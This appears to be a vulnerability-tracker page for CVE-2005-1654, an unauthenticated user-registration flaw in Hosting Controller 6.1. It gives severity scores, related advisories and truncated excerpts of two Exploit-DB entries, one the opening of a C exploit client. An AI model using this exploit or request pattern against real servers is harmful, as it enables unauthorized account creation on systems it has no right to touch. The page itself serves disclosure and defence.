CVE-2005-1654
published 2005-05-18CVE-2005-1654: Hosting Controller 6.1 Hotfix 1.9 and earlier allows remote attackers to register arbitrary users via a direct request to addsubsite.asp with the loginname and…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.48%
82.6th percentile
Hosting Controller 6.1 Hotfix 1.9 and earlier allows remote attackers to register arbitrary users via a direct request to addsubsite.asp with the loginname and password parameters set.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hosting_controller | hosting_controller | — | — |
| hostingcontroller | hosting_controller | < 6.1 | 6.1 |
| hostingcontroller | hosting_controller | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r2qw-423m-96mg: Hosting Controller 6
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6496 [HIGH] GHSA-r2qw-423m-96mg: Hosting Controller 6
Hosting Controller 6.1 Hot fix 3.3 and earlier allows remote attackers to register arbitrary users via a request to hosting/addsubsite.asp with the loginname and password parameters set, when preceded by certain requests to hosting/default.asp and hosting/selectdomain.asp, a related issue to CVE-2005-1654.
GHSA
GHSA-wq45-c8xj-98wj: Hosting Controller 6
ghsa_unreviewed·2022-05-01
CVE-2005-1654 [HIGH] CWE-425 GHSA-wq45-c8xj-98wj: Hosting Controller 6
Hosting Controller 6.1 Hotfix 1.9 and earlier allows remote attackers to register arbitrary users via a direct request to addsubsite.asp with the loginname and password parameters set.
No detection rules found.
Exploit-DB
Hosting Controller 0.6.1 - User Registration (2)
exploitdb·2005-05-07
CVE-2005-1654 Hosting Controller 0.6.1 - User Registration (2)
Hosting Controller 0.6.1 - User Registration (2)
---
/*****************************************************
* *
* [Hosting Controller
#include
#include
#include
#include
#include
#define PORT1 80 // port of web server
#define PORT2 8077 // port of hosting controller
void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
type = atoi(argv[6]);
if(argc!=7 || (type 2))
info();
banner();
if((sock = socket(AF_INET,SOCK_STREAM,0)) h_addr,hp->h_length);
addr.sin_family = AF_INET;
if(type == 1)
addr.sin_port = htons(PORT1);
else
addr.sin_port = htons(PORT2);
sockconn = connec
Exploit-DB
Hosting Controller 0.6.1 - User Registration (1)
exploitdb·2005-05-04
CVE-2005-1654 Hosting Controller 0.6.1 - User Registration (1)
Hosting Controller 0.6.1 - User Registration (1)
---
Domain:
Username:
Mailserver:
Password:
# milw0rm.com [2005-05-04]
No writeups or analysis indexed.
2005-05-18
Published